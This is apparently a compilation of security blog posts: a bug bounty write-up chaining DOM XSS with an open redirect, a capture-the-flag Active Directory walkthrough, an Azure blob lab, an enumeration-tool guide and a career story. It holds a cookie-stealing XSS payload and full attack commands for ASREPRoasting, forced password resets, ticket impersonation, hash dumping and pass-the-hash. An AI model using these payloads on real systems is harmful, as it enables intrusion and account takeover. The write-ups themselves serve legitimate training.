One thing I had heard a lot in bug bounty is that open redirects on their own usually do not have much impact. And honestly, that is often true. But the first time I really understood bug chaining was after reading Bug Bounty Bootcamp by Vickie Li. That idea stayed with me.

At the time, I was actually hunting for SSRF when I landed on an open redirect on a subdomain belonging to a large telecom company. Instead of moving on, I decided to read the JavaScript to understand how it worked. That is when I found something much better: a DOM-Based XSS.

Most of my payloads were blocked, but I found one that worked:

<Img Src=OnXSS OnErroR=confirm(document.cookie)>

That confirmed JavaScript execution. From there, I started thinking beyond just XSS and asked myself: can I turn this into real impact?

I noticed the application attached a query parameter called utm_source, and that value could be updated through the DOM. That let me use this payload:

<Img Src=OnXSS OnErroR=utm_source=encodeURIComponent(btoa(document.cookie))>

By chaining that with the open redirect, I was able to exfiltrate cookie data and reuse the victim’s session, which led to session hijacking and ultimately account takeover.

The redacted endpoint structure looked like this:

https://example-sub.example.com/preview?next=<ATTACKER_CONTROLLED_URL>&bannerText=<Img Src=OnXSS OnErroR=utm_source=encodeURIComponent(btoa(document.cookie))>

What made this work was simple:

• the cookies were not HttpOnly, so JavaScript could read them

• the next and bannerText parameters were not properly validated or sanitized

That is what made the chain dangerous. The open redirect alone might not have been enough, but combined with DOM XSS and readable session cookies, it became a medium-severity account takeover

The Moment It Got Triaged

One of the best parts of this experience was getting the triage message back and seeing that the report was marked as triaged and medium severity. Since this was my first valid bug bounty report and it was also not a duplicate, that moment meant a lot to me.

This bug taught me something I will carry into every hunt: do not dismiss “low-impact” bugs too quickly. Sometimes the real value is not the first bug you find, but what happens when you connect it to something else.

In this room, we'll step into the shoes of a red teamer in a simulated hack challenge. We'll navigate a realistic organizational environment with up-to-date defenses, where we'll test our penetration testing skills, try to bypass security measures, and infiltrate the system.

From our nmap scan, using the tool nmapAutomator, we can see that the machine is a Windows server running Active Directory. Below is a snippet of the nmap results that will be most important for us.

 sudo nmapAutomator.sh -t Full -H 10.10.149.103

PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-19 07:41:43Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: HAYSTACK
|   DNS_Domain_Name: thm.corp
|   DNS_Computer_Name: HayStack.thm.corp
|   DNS_Tree_Name: thm.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-19T07:42:35+00:00
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2025-07-18T07:32:24
|_Not valid after:  2026-01-17T07:32:24
|_ssl-date: 2025-07-19T07:43:15+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

From the nmap scan we can see that the domain for this server is thm.corp and the DNS Computer name is haystack.thm.corp. Both of these domains we add them in /etc/hosts

10.10.149.103       thm.corp haystack.thm.corp

By using crackmapexec we are able to list the shares with a guest user as it is not disabled and does not require a password. We can see from the results that we are able to read and write in Data share drive.

crackmapexec smb thm.corp -g 'guest' -p '' --shares

To access the share drive we use smbclient and pass the guest user account with no password. In the drive we find a directory named onboarding and within the directory we find 3 files and we use the smb commands to download all of them.

smbclient //thm.corp/Data -U guest

# Download the files from smbclient
prompt off # this disables confirmation when downloading
resurse on # this is to download even sub directory data if they exist 
mget * # this is to download everything in the current directory 
exit # to exit the smbclient shell session

Now that we have downloaded all the files to our local machine, we can see that the text file contains an email template. It appears to be intended for a new team member and includes a default password: ResetMe123!.

cat 4fx32pug.h2y.txt

Well we have a password but no user account, it’s time we find a user. As we noticed that the guest account is active we use impacket’s lookupsid to try and grab all the local and domain usernames in the server.

impacket-lookupsid thm.corp/guest@thm.corp -no-pass  |  awk -F '[:\\\\\\\\(\\\\)]' '/SidTypeUser/ {{print $3}}'

We save the list of users to the users.txt file for safe keeping as we may need it later. To find if a user didn’t update their password and still uses the default one we can use kerbrute or crackmapexec and in this case I used crackmapexec and found a valid user LILY_ONEILL.

crackmapexec smb thm.corp -u users.txt -p 'ResetMe123!'

Even though we found valid user credentials, we couldn't use them because they were revoked. So, we need to find another attack path. Just like we used impacket-lookupsid, we will use impacket-GetNPUsers, which tries to collect non-preauth AS_REP responses for a given list of users. This method is known as ASREPRoasting. From the list of hashes we obtained, we managed to crack the password for TABATHA_BRITT using hashcat, as shown below.

 impacket-GetNPUsers 'thm.corp/guest'@thm.corp -no-pass -request -usersfile users.txt

hashcat hash.txt /opt/wordlists/rockyou.txt

Now that we have a valid username and password we need an advantage which in this case is to use bloodhound to gather more information about our target.

bloodhound-python -d thm.corp -u tabatha_britt -p 'marlboro(1985)' -ns 10.10.149.103  -c all

To launch the Bloodhound web interface, use the following command. When you run sudo docker-compose -f bloodhound.yml up, you will receive a default password. The username will be admin, and you'll need to use the provided password initially, then reset it.

sudo apt update && sudo apt upgrade
sudo apt install docker.io
sudo systemctl enable docker --now
sudo apt install docker-compose
curl -L https://ghst.ly/getbhce -o bloodhound.yml
sudo docker-compose -f bloodhound.yml up

After logging into the interface, upload all the Bloodhound files and go to Explore. Instead of searching, click on PATHFINDING. From SEARCHING, we know that CECILE_WONG is part of the Domain Admins, so we need to find the path to her account.

The snippet above shows that TABATHA_BRITT can force a password change for SHAWNA_BRAY, who can do the same for CRUZ_HALL. CRUZ_HALL can then force a password change for DARLA_WINTERS, who has permissions to delegate on the server. We use the following steps to change the passwords of these users.

net rpc password "SHAWNA_BRAY" "P@ssw0rd123" -U "thm.corp"/"TABATHA_BRITT"%"marlboro(1985)" -S "10.10.149.103"  
net rpc password "CRUZ_HALL" "P@ssw0rd123" -U "thm.corp"/"SHAWNA_BRAY"%"P@ssw0rd123" -S "10.10.149.103" 
net rpc password "DARLA_WINTERS" "P@ssw0rd123" -U "thm.corp"/"CRUZ_HALL"%"P@ssw0rd123" -S "10.10.149.103"

Now that we have DARLA_WINTERS' valid credentials we use impacket-findDelegation to list the delegation rights.

impacket-findDelegation thm.corp/'DARLA_WINTERS':P@ssw0rd123  -dc-ip 10.10.149.103

From the list we choose the cifs/HayStack.thm.corp to impersonate an administrator and request a ticket on behalf of the administrator then save that ticket to KRB5CCNAME environment variable.

# Request ticket onbehalf of the administrator 
impacket-getST thm.corp/'DARLA_WINTERS':'P@ssw0rd123' -spn cifs/HAYSTACK.thm.corp -impersonate administrator -dc-ip 10.10.149.103

# Save to environment variable
export KRB5CCNAME=administrator@cifs_HAYSTACK.thm.corp@THM.CORP.ccache

Now that we have the ticket we can pass the ticket and dump the domain controller NTLM hashes for all the users.

impacket-secretsdump thm.corp/administrator@HAYSTACK.thm.corp -k -no-pass -dc-ip 10.10.149.103 -just-dc-ntlm

Final step is to use evil-winrm to get shell session with CECILE_WONG's NTLM hash who is part of the domain admin users.

evil-winrm -u CECILE_WONG -H 067a84e5afaed843ed4a8fdac5facac3 -i thm.corp

As you followed along, you'll notice that I didn't show any flags, and that was intentional. This write-up is meant to help you understand and develop the mindset of a penetration tester. We are not hunting for flags; instead, we are simulating real-world attacks. Keep practicing, stay curious, and let each challenge sharpen your approach to real-world security testing.

# url 
http://dev.megabigtech.com/$web/index.html

We attempted to use the MicroBurst to enumerate the blob, but we didn’t get any results, so now we are proceeding manually.

# we add these query parameters to the blob storage and see what we can find
?restype=container&comp=list

# Full url 
https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list

Upon investigation, we discovered that only the static CSS and HTML files were available for the hosted website. Unfortunately, there wasn’t anything particularly engaging or noteworthy within the files.

# We add the query to include versions 
?restype=container&comp=list&include=versions

# Full url 
https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions

Although our previous attempts have not been entirely successful, we decided to utilize the terminal to incorporate the ‘x-ms-version’ header, specifically set to the date 2019-12-12, as outlined in the Microsoft documentation. By doing this, we finally managed to successfully access the ‘scripts-transfer.zip’ file.

# Full url 
https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions

# Terminal command 
 curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions'

I attempted to download the file using my browser, but unfortunately, that method wasn't successful. As a result, we decided to revert back to using the terminal for the download process. This time, we made sure to include the 'x-ms-version' as a header to ensure compatibility with the server's requirements.

# Terminal command
curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web/scripts-transfer.zip?versionId=2024-03-29T20:55:40.8265593Z'  --output scripts-transfer.zip

The zip file contained two PowerShell scripts that include credentials for the Azure portal.

unzip scripts-transfer.zip

We use the cat command to list the contents of two files. However, entra_users.ps1 contains clear text credentials, and running this script would allow us to list all user information.

cat entra_users.ps1

Before running the script, we need to install the required modules, which are listed at the beginning of the script. Running the script will provide us with a flag that can be found under the job title in one of the user information sections.

# Install the modules 
Install-Module -Name Az
Install-Module -Name MSAL.PS

# Then we run the script 
.\entra_users.ps1

Active Directory(AD) enumeration is like exploring a Windows network's phonebook (Active Directory) to find information on users, groups, computers, and more. This helps system admins improve security and ethical hackers find weaknesses. But remember, it's only okay to do this on a network you have permission to access!

To enumerate this information, you first need to run Impacket's lookupsid.py to list all users, groups, computers, and more. Then, filter out the usernames and store them in a user list file. Next, run impacket's GetNPUsers.py (this attack is called ASREPRoast) to target users with a weak security setting called "Do not require Kerberos preauthentication." This allows the script to potentially capture password information (AesRep hash) without needing the actual password. Alternatively, you can use GetUserSPNs.py to enumerate Service Principal Names (SPNs) associated with user accounts in an Active Directory environment. These two scripts are used to steal users' hashes. You can then run those hashes against Hashcat or John the Ripper to crack them.

When you have found valid credentials, you might want to understand the AD layout. In that case, you should run BloodHound to see which users, groups, and computers have specific permissions. All of this involves a lot of manual work, running one script after another. But what if you could automate this process?

The Cicada Mastertul gives you the flexibility to automate all these tasks and more, such as enumerating SMB shares and downloading their content, checking for WinRM connections, and performing LDAP enumeration. All you need to do is provide valid credentials and let the tool handle the rest, saving you time for other important tasks.

Although I won't cover every technique for using this script, I'll show the basic usage. Perhaps I'll write full documentation for it someday. For now, I'll showcase some examples based on what you want to enumerate. I have used a username (-u) and password (-p) for enumeration in these examples, but you can use an NTLM hash (-H) if you only have that. If you do not provide a flag, it will default to full mode (--full). If you provide a network, each enumeration will be in its respective IP address folder, and everything will be organized. You can find the usage manual by using

python3 cicada-mastertul.py -h

Lookupsid Enumeration

In this case I used a valid IP address instead of a network address to only enumerate a single host

python3 cicada-mastertul.py -u Administrator -p 'Password123!' -t 192.168.40.6 -d mayorsec.local --lookupsid

Kerberos Enumeration

Kerberos enumeration includes Impacket's GetNPUsers and GetUserSPNs. If you don't include the (--crack) flag, it will just grab the hashes and not run them against Hashcat. The --crack flag should be used with a wordlist (-w).

python3 cicada-mastertul.py -u Administrator -p 'Password123!' -t 192.168.40.6 -d mayorsec.local --kerberos

SMB Enumeration

With a network IP address, you can pass that in and let the tool find all IP addresses with smb enabled and enumerate them.

python3 cicada-mastertul.py -u Administrator -p 'Password123!' -t 192.168.40.0/24 -d mayorsec.local --smb

Full Enumeration

Full enumeration runs everything and might take longer depending on the IP addresses list of hosts.

python3 cicada-mastertul.py -u Administrator -p 'Password123!' -t 192.168.40.6 -d mayorsec.local --full

As I explained, these are just examples; you can experiment with the tool and try different things. I hope you enjoy it.

The Cicada Mastertul github link

My journey mirrored this conventional path. From my early years until the culmination of grade 12, my goal was to become a doctor. It seemed like the only logical choice. However, a turning point in my life occurred when my sister indirectly introduced me to the world of technology while we were engrossed in watching the popular TV show, "Blindspot."

Blindspot was an intriguing series that revolved around a woman discovered naked in Times Square, her body intricately covered with enigmatic tattoos. These tattoos became the key to solving various cases and thwarting terrorist attacks for the FBI team. While watching the show, I found myself captivated by the tech side of the investigations. Although it was a fictional portrayal of technology, I told myself that this was what I wanted to learn and explore.

Following that revelation, I became utterly obsessed with computers and how they functioned. So passionate was I about this newfound interest that I made a drastic decision: I dropped out of my Teaching course to enroll in an IT course. I yearned to be behind a computer, understanding the inner workings of this incredible technology.

I can vividly recall the exhilaration of writing my very first "Hello World!" program using Java. The satisfaction I derived from this simple code was unparalleled. I dedicated three hours each day to practice and refine my programming skills, eventually becoming quite proficient.

This transformative journey taught me a vital lesson: one should never allow others to determine their life's path. Had I succumbed to the stereotypical mindset prevalent in my community, I wouldn't be where I am today—a developer and pentester. My story serves as a testament to the importance of following your passion, regardless of societal expectations. It's a reminder that breaking stereotypes and pursuing your dreams can lead to a fulfilling and extraordinary life journey.